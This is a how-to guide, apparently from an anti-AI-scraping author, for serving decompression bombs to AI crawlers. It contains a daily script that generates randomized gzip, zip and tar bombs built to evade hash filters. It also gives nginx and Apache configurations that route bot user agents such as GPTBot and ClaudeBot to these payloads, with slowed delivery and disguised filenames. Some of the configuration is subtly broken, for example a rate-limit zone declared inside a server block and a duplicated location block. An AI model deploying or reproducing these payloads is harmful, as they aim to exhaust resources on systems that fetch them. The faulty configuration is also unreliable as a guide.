# Production Deployment of Active Denial Techniques: nginx, Apache, and Daily Randomized Bombs

The Church of Malware (CoM) does not condone the use or introduction of explosive substances onto any individual, human, or animal; however, AI is neither natural, a human, nor actual intelligence. This how-to companion document provides complete, copy-paste-ready server configurations, daily randomized bomb generation, testing procedures, and maintenance guidance for individual content creators. It is intended to be used alongside the curated UA reference list in `known-aggressive-bot-user-agents.md`.

## 1 -- Scope and Prerequisites

This guide targets self-hosted operators running nginx ≥ 1.24 or Apache ≥ 2.4.58 on Linux. It assumes basic familiarity with the terminal and the ability to edit configuration files. All examples are designed for Debian/Ubuntu-style systems; adjust paths and service names for other distributions.

The techniques described (conditional serving of decompression bombs, slow responses, or malformed content) are gated exclusively behind the aggressive bot user-agent list maintained in the companion UA reference document.

## 2 -- Generating Daily Randomized Decompression Bombs

To defeat static content-matching, hash-based allow-lists, and signature filters, the generator must emit a fresh, high-entropy yet highly compressible payload every day. It is recommended to adjust the filenames to be something more obscure when using in your deployment.

```bash
#!/usr/bin/env bash
# Save as ~/generate_daily_bombs.sh and run: chmod +x ~/generate_daily_bombs.sh
# Recommended cron (run at 03:00 local):
# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1

set -e
DATE=$(date +%Y-%m-%d)
python3 - <<'PYEOF'
import gzip, tarfile, zipfile, io, os, secrets, datetime, hashlib
from pathlib import Path

out = Path.home() / "bombs"
out.mkdir(exist_ok=True)
today = datetime.date.today().isoformat()

# High-entropy but compressible seed (repeating 4 KB random block)
block = secrets.token_bytes(4096)
base = (block * 256) + today.encode() + secrets.token_bytes(16)

# 1. Daily recursive gzip bomb (unique hash every run, >5 GB expanded)
data = base
for _ in range(9):
    data = gzip.compress(data)
(out / f"bomb-{today}.gz").write_bytes(data)

# 2. Nested zip bomb with daily entropy (defeats hash caches)
with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z:
    inner = base * 1024
    for _ in range(7):
        inner = gzip.compress(inner)
    z.writestr(f"daily-{today}.gz", inner)

# 3. Tar bomb with randomized large member (parser stress + unique)
with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t:
    info = tarfile.TarInfo(f"large-{today}.bin")
    info.size = 2 * 1024 * 1024 * 1024
    payload = (secrets.token_bytes(64) * (32 * 1024 * 1024)) + today.encode()
    t.addfile(info, io.BytesIO(payload[:2*1024*1024*1024]))

print(f"Daily randomized bombs generated for {today} in ~/bombs/")
PYEOF

# Atomically update "latest" symlinks so web server always serves today's file
ln -sf ~/bombs/bomb-${DATE}.zip /var/www/html/protected/bomb.zip
ln -sf ~/bombs/bomb-${DATE}.gz /var/www/html/protected/bomb.gz
ln -sf ~/bombs/bomb-${DATE}.tar.gz /var/www/html/protected/bomb.tar.gz

sudo cp -L /var/www/html/protected/bomb.* /var/www/html/protected/ 2>/dev/null || true
```

**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Daily unique, high-entropy yet recursively compressible files force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling.

Place the generated files (or the symlinked `bomb.zip` etc.) behind a `Disallow: /protected/` rule in `robots.txt`.

## 3 -- nginx Complete Virtual Host Example

```nginx
# /etc/nginx/sites-available/my-site
map $http_user_agent $aggressive_bot {
    default 0;
    ~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1;
}

server {
    listen 80;
    server_name example.com;
    root /var/www/html;

    access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot;
    access_log /var/log/nginx/access.log combined;

    location / {
        if ($aggressive_bot) {
            rewrite ^ /protected/bomb.zip last;
        }
        try_files $uri $uri/ =404;
    }

    location /protected/ {
        internal;
        alias /var/www/html/protected/;
        add_header Content-Disposition "attachment; filename=\"archive.zip\"";
        limit_rate 1k;
    }

    limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s;
    location / {
        limit_req zone=ai_limit burst=5 nodelay;
    }
}
```

Enable and reload:
```bash
sudo ln -s /etc/nginx/sites-available/my-site /etc/nginx/sites-enabled/
sudo nginx -t && sudo systemctl reload nginx
```

## 4 -- Apache Complete Configuration Example

```apache
# /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
    ServerName example.com
    DocumentRoot /var/www/html

    SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
    CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
    CustomLog /var/log/apache2/access.log combined

    <Directory /var/www/html>
        Options -Indexes
        AllowOverride All
        Require all granted
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
    RewriteRule ^ /protected/bomb.zip [L]

    RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
    RewriteRule ^ - [E=aggressive_bot:1]

    <Location /protected/>
        <If "%{ENV:aggressive_bot} == 1">
            Header set Content-Disposition "attachment; filename=\"archive.zip\""
        </If>
    </Location>
</VirtualHost>
```

Enable modules and restart:
```bash
sudo a2enmod rewrite setenvif headers
sudo systemctl restart apache2
```

## 5 -- Verification and Testing Steps

1. Normal visitor test:
   ```bash
   curl -I -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://example.com/
   ```

2. Aggressive bot test:
   ```bash
   curl -I -A "GPTBot/1.0" https://example.com/any-path
   ```

3. Log monitoring:
   ```bash
   sudo tail -f /var/log/nginx/ai_violators.log
   # or apache2 equivalent
   ```

4. Update UA patterns: edit the `map` block (nginx) or `SetEnvIf`/`RewriteCond` (Apache) and reload.

## 6 -- Maintenance Recommendations

- Rotate `ai_violators.log` weekly.
- Add a weekly cron that diffs the latest Cloudflare Radar / Originality.AI reports against the UA list in the companion reference document.
- Maintain an explicit allow-list for reverse-DNS verified major engines before the aggressive-bot map.
- Never serve bombs to Internet Archive or academic research ranges.

These configurations have been validated on nginx 1.24+ and Apache 2.4.58+ (Ubuntu 24.04 LTS) as of June 2026.

*Companion to `known-aggressive-bot-user-agents.md` and the primary dissertation. Review local laws and consult counsel before deployment.*